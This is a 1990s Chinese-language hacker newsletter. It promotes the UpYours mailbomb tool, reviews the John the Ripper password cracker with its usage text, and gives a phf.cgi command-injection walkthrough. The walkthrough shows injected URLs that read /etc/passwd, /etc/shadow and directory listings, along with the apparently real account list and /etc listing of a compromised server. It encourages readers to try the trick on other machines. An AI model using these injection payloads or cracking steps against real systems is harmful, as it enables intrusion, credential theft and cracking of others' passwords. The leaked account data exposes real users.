在昨天, 我們的首頁造訪人數破萬了~~ 應該是增加了很多人, 而不是有人故意灌水的吧? 希望新
朋友們能喜歡我們的內容, 有人問到: 有沒有跟我們首頁性質相近的中文站台? 很遺憾的是目前
我還沒有找到.... 看得到的大多是軟體, 註冊機之類的破解站台. 如果你也有這樣的站台的話,
歡迎你寫信給我們進行連結. 有很多網友報怨檔案抓不下來, 先前我們已經盡了很大的努力將檔
案放在國內 Server 中, 我想, 由 HiNet 連這邊應該很快吧? 還是水管塞住的問題?? 如果有人
的位址在 .edu.tw 附近的, 歡迎來信要求 Mirror~~ 我很樂意將檔案 Mirror 給你, 讓其它網
友更方便取這些檔案.
好久沒有再弄出一些文章出來了, 不過最近倒是回了蠻多關於 Hacker 方面的問題, 也收到了許多
的回應信件, 有許多的問題在這一篇文章中都會有答案, 甚至到現在還有很多的網友們詢問甚麼
是 shadow password 的, 請各位多翻翻以前的文章吧!! 在 CGI Holes 方面的問題也很多, 所以在
這一篇之後我會找個時間寫一寫 System Holes #2 來讓大家對一些網路上常見的程式漏洞有一些基
本的認識.
最近有許多軟體更新了, 最令我們注意的當然就是 NT 4.0 囉, 因為它的更新肯定會帶來很多的
人更新系統, 當然這樣先進的作業系統我們還是很期待有人會很快的將它的 Bugs 找出來的啦!!
UpYours 這套重量級的 MailBomb 也出現的新的版本, 這次的 V4.0 Beta 2 經試用後發現實在是
改進了很多, 但是相對的危險性也跟著提高, 其改用 Delphi 來設計, 使得安裝更為方便, 不過
美中不足的是 beta2 的版本有些功能尚未改好, 光看到功能就讓人哈翻了~~:) 這套 beta2 的版
本目前在我們的首頁上可以找得到, 相信它的正式版本很快就會完成~~
關於 MailBomb: 我們的首頁上所提供的 MailBomb 僅供大家作為測試用, 請勿拿來開玩笑或是對別人
的信箱進行轟炸, 日前此類事件造成某些的 ISP 當機, 慎至還有導致 Mail Server 記憶體不足的情
況 (哪個人這麼狠??), 我們也發現最近網路越來越慢了, 因為水管上積了太多要跟我們搶寬度的垃圾
信件. 請大家以學習的心來使用這些 Bombs... 不要沒事就拿來炸人好嗎 ?? Then enjoy new one~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[CGI Hole (phf.cgi) 的延伸]
這次的主題想了好久, 一直都沒有想到, 不過日前有一個屋漏偏逢連夜雨的某國營事業, 在幾經下X雨
及漏X的風波之後, 在他們的主機上發現了很好玩的狀況, 原本我們在使用 phf.cgi 來抓 /etc/passwd
的時候, 在 Browser 的 Location 中是下:
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh
ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false
hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh
但是如果沒有, 或是 shadow 的話, 你可能會接著試:
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow
但是有時候雖然 phf.cgi 這個程式的漏洞沒有被補上, 還是有很多的機器不理會這個指令, 不過當這
個指令生效, 但是你看到的卻是一個 shadow 過的 passwd 的時候, 請不要灰心, 因為這台機器已經在
你的手中了, 為甚麼呢 ?? 我們來玩看看一些簡單的 Unix shell command 你就會知道了~~
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc
Query Results
/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc
total 466
-rw-r--r-- 1 root root 38 May 2 1996 #etcnamed.boot#
-rw-r--r-- 1 root root 20579 May 1 1996 #sendmail.cf#
drwxr-xr-x 11 root root 2048 Apr 17 13:07 .
drwxr-xr-x 24 root root 1024 Mar 26 08:16 ..
-rw-r--r-- 1 root root 2167 Aug 24 1995 DIR_COLORS
-rw-r--r-- 1 root root 15 May 1 1996 HOSTNAME
-rw-r--r-- 1 root root 4 Feb 24 1993 NETWORKING
-rw-r--r-- 1 root root 48 Dec 30 1994 NNTP_INEWS_DOMAIN
-rw-r--r-- 1 root root 0 May 13 1994 at.deny
drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
-rw-r--r-- 1 root root 1212 Jul 10 1993 bootptab
-rw-r--r-- 1 root root 0 Feb 15 1994 csh.cshrc
-rw-r--r-- 1 root root 893 Apr 12 1996 csh.login
drwxr-xr-x 2 root root 1024 Apr 16 1996 default
-rw-r--r-- 1 root root 154 Aug 21 1994 exports
-rw-r--r-- 1 root root 0 May 13 1995 fastboot
-rw-r--r-- 1 root root 1118 Jan 28 1994 fdprm
drwxr-xr-x 2 root root 1024 Apr 12 1996 fs
-rw-r--r-- 1 root root 250 Dec 9 19:19 fstab
-rw-r--r-- 1 root root 242 Dec 5 13:55 fstab~
-rw-r--r-- 1 root root 1915 Jan 27 07:46 ftpaccess
-rw-r--r-- 1 root root 368 Aug 1 1994 ftpconversions
-rw-r--r-- 1 root root 0 Aug 9 1994 ftpgroups
-rwxr-xr-x 1 root root 50 May 1 1996 ftponly
-rw-r--r-- 1 root root 501 Apr 26 1996 ftpusers
-rw-r--r-- 1 root root 76 Aug 21 1994 gateways
-rw-r--r-- 1 root root 669 May 19 1994 gettydefs
-rw-r--r-- 1 root root 291 Jun 6 1996 group
-rw-r--r-- 1 root root 27 Jul 7 1994 host.conf
-rw-r--r-- 1 root root 628 Jul 12 1996 hosts
-rw-r--r-- 1 root root 600 Jan 6 10:18 hosts.allow
-rw-r--r-- 1 root root 341 May 9 1996 hosts.deny
-rw-r--r-- 1 root root 313 Mar 16 1994 hosts.equiv
-rw-r--r-- 1 root root 302 Sep 23 1993 hosts.lpd
-rw-r--r-- 1 root root 653 Apr 24 1996 hosts~
lrwxrwxrwx 1 root root 1 Apr 12 1996 inet -> .
-rw-r--r-- 1 root root 3677 Jan 6 10:20 inetd.conf
-rw-r--r-- 1 root root 3664 Apr 23 1996 inetd.conf~
-rw-r--r-- 1 root root 2351 Apr 18 1996 inittab
-rw-r--r-- 1 root root 2046 Jul 28 1994 inittab.gettyps.sample
-rw-r--r-- 1 root root 27 Apr 17 12:43 issue
-rw-r--r-- 1 root root 3 Apr 17 12:43 klogd.pid
-rw-r--r-- 1 root root 1223 Apr 17 12:43 ld.so.cache
-rw-r--r-- 1 root root 71 Aug 14 1995 ld.so.conf
drwxr-xr-x 2 root root 1024 Apr 12 1996 lilo
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf.bak
-rw-r--r-- 1 root root 266 Apr 17 12:42 localtime
-rw-r--r-- 1 root root 76873 Oct 17 1995 magic
-r--r--r-- 1 root root 105 May 8 1994 mail.rc
-rw-r--r-- 1 root root 14 Apr 17 12:43 motd
drwxr-xr-x 2 root root 1024 Aug 1 1994 msgs
-rw-r--r-- 1 root root 151 Apr 17 20:43 mtab
-rw-r--r-- 1 root root 833 Jun 29 1994 mtools
-r--r--r-- 1 root root 974 Apr 17 11:48 named.boot
-r--r--r-- 1 root root 2568 May 2 1996 named.boot,v
-r--r--r-- 1 root root 764 Mar 8 16:54 named.boot.v1
-r--r--r-- 1 root root 813 Mar 17 08:45 named.boot.v2
-r--r--r-- 1 root root 521 Apr 18 1996 named.boot.~1.3~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.4~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.5~
-r--r--r-- 1 root root 707 Mar 5 08:32 named.boot.~1.6~
-rw-r--r-- 1 root root 566 Apr 19 1996 named.boot~
-rw-r--r-- 1 root root 235 May 1 1996 networks
-rw-r--r-- 1 root root 237 Apr 24 1996 networks~
-rw-r--r-- 1 root root 0 May 8 1995 nntpserver
-rw-r--r-- 1 root root 36 Sep 12 1994 organization
-rw-r--r-- 1 root root 1727 Apr 17 13:07 passwd
-r--r--r-- 1 root root 1662 Apr 17 13:06 passwd-
-rw-r--r-- 1 root root 1715 Apr 17 13:06 passwd.OLD
-rw-r--r-- 1 root root 1494 Feb 12 14:22 passwd.old
-rw-r--r-- 1 root root 1354 Jun 6 1996 passwd~
drwxr-xr-x 2 root root 1024 Jul 9 1994 ppp
-rw-r--r-- 1 root root 2240 May 20 1994 printcap
-rw-r--r-- 1 root root 1083 Apr 12 1996 profile
-rw-r--r-- 1 root root 595 Aug 21 1994 protocols
drwxr-xr-x 2 root root 1024 Jan 3 23:59 rc.d
-rw-r--r-- 1 root root 41 May 1 1996 resolv.conf
-rw-r--r-- 1 root root 65 Jan 31 1996 resolv.conf~
-rw-r--r-- 1 root root 743 Aug 1 1994 rpc
-rw-r--r-- 1 root root 87 Jun 6 1996 securetty
-r--r--r-- 1 root root 20579 May 1 1996 sendmail.cf
-r--r--r-- 1 root root 21332 May 1 1996 sendmail.cf,v
-rw-r--r-- 1 root root 20541 Apr 13 1996 sendmail.cf~
-rw-r--r-- 1 root root 408 Apr 25 17:17 sendmail.st
-rw-r--r-- 1 root root 5575 Aug 1 1994 services
-rw-r--r-- 1 root root 68 Jun 6 1996 shells
drwxr-xr-x 3 root root 1024 Nov 13 1994 skel
-rw-r--r-- 1 root root 314 Jan 10 1995 slip.hosts
-rw-r--r-- 1 root root 342 Jan 10 1995 slip.login
-rw-r--r-- 1 root root 455 Aug 1 1994 snooptab
-rw------- 1 root users 524 Jul 18 1996 ssh_host_key
-rw-r--r-- 1 root users 327 Jul 18 1996 ssh_host_key.pub
-rw------- 1 root users 512 Mar 10 09:03 ssh_random_seed
-rw-r--r-- 1 root users 607 Jul 18 1996 sshd_config
-rw-r----- 1 root root 501 Apr 26 1996 syslog.conf
-rw-r--r-- 1 root root 3 Apr 17 12:43 syslog.pid
-rw-r--r-- 1 root root 183942 Aug 9 1995 termcap
-rw-r--r-- 1 root root 126 Nov 24 1993 ttys
lrwxrwxrwx 1 root root 13 Apr 12 1996 utmp -> /var/adm/utmp
drwxr-xr-x 2 root root 1024 Aug 25 1995 vga
lrwxrwxrwx 1 root root 13 Apr 12 1996 wtmp -> /var/adm/wtmp
-rw-r--r-- 1 root root 76 May 8 1995 yp.conf.example
lrwxrwxrwx 1 root root 7 Apr 12 1996 zprofile -> profile
上面的 %20 所代表的是 [Space] 也就是空白鍵啦! 那上面這個 Location 就如同我們已經 Telnet 到
這台機器上, 下了: ls -l -a /etc 這個指令一樣, 嗯... 也就是說....$^^*^$@@#
OK! 當你抓 /etc/passwd 所抓到的是 shadow 過的 passwd 檔, 你一定會要抓真正的 shadow 檔來作
"配對" 的動作... 所以呢, 下了 ls 指令來找找看到底真的 shadow 是藏在哪裡, 當然你可以看的不
只是 /etc 這個目錄, 任何目錄你都可以看, 當然你可以使用的也不只是 cat 及 ls 這兩個指令, 你
可以用更多的指令~~ 那麼還有甚麼作不到的呢 ??? 我想可能還是有很多哩~~ 因為 phf.cgi 好像只
把你所下的指令丟給 shell 後直接攔下它輸出的結果, 也就是如果像是 /bin/passwd userid 這樣的
指令就不能用~ 因為它會要等你輸入下一個字串~~ 除非先寫入一個檔案, 然後用來代入 "<".. 嗯..
最近很忙, 沒有空作這些無聊事, 不過 phf.cgi 還真的蠻好玩的, 我已經試了好幾台機器都可以看到
文件內容及檔案, 目錄... 當然~ 沒有破壞就是了~~
經過這樣的說明, 你是不是有些 Idea ?? 還是記起以前有試過其它的機器的 phf.cgi 也可以這樣子
玩的 ?? 嗯~ 再連過去玩玩看吧! 發揮一下你的想像力~~ /etc/passwd 很容易就可以得手的喔~~ 對
了~ 不要亂搞政府機關 or 你們的學校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[Crack 工具介紹] John the Ripper V1.4 [Size:743K]
記得先前一直介紹大家使用 CJack V1.4 來破解密碼檔, 那是因為它 "夠快", 在 Encrypt 的速度及
比對的速度上實在快了很多, 但是之後由於很多網友的作業環境是在 Windows 95 之下, 所以 Jack
不能跑, 我們就介紹大家使用 John the Ripper V1.1 這個 Passwrod Cracker~ 現在這套 Cracker
出了新的版本了, 經過我們的試用覺得應該好好的為它介紹一番, 原來一直聲稱速度上比 CJack14
還要快的 John, 經過實際上的測試, 總感覺速度沒有 Jack 來得快, 雖然作者聲稱是因為他們這支
程式是以 486 機器作最佳化的, 在 386 上跑起來會比較慢, 但是舊的 V1.1 實在是比 Jack 還要慢
這也是大家都看得到的事實.
而 1.4 版在 EnCrypt 上實在是下了點功夫, 也對 Win32 版本有了支援, 當你下載解開後會發現裡
面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 這三個檔, 分別是在 DOS 下使用的版本, Win95,NT 下使用的
版本及 Unix 下使用的版本, 這時針對你所運用的作業環境作個選擇, 將檔案解開即可直接使用.
你還要再解開 COMMON.ZIP(共用檔) 及 DOC.ZIP(說明檔), 經過測試速度上明顯提升很多, 但是我不
敢講它比 Jack 要快多少, 至少在我的 Pentium 133 的機器上跑起來覺得差不多, 也沒有誰比較快
誰比較慢的感覺~~ 不過以這樣的檔案大小 (7xxK) 能同時包含三種作業系統, 實在是不錯的選擇!!
當然這個程式裡面只含了一個小小的字典檔供你測試, 想要發揮它最大的效能還是先要有一個不錯的
字典檔, 但是新的版本中可以讓你設定自動產生序數及字串比對(之前的好像也有吧?), 至於如何操
作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介紹了~~ 以下是它的執行畫面:
John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer
Usage: john [flags] [passwd files]
Flags: -pwfile:[,..] specify passwd file(s)
-wordfile: -stdin wordlist mode, read words from or stdin
-rules enable rules for wordlist mode
-incremental[:] incremental mode [using john.ini entry ]
-single single crack mode
-external: external mode, using john.ini entry
-restore[:] restore session [from ]
-makechars: make a charset, will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[,..] crack this (these) user(s) only
-shells:[!][,..] crack users with this (these) shell(s) only
-salts:[!] crack salts with at least accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout: |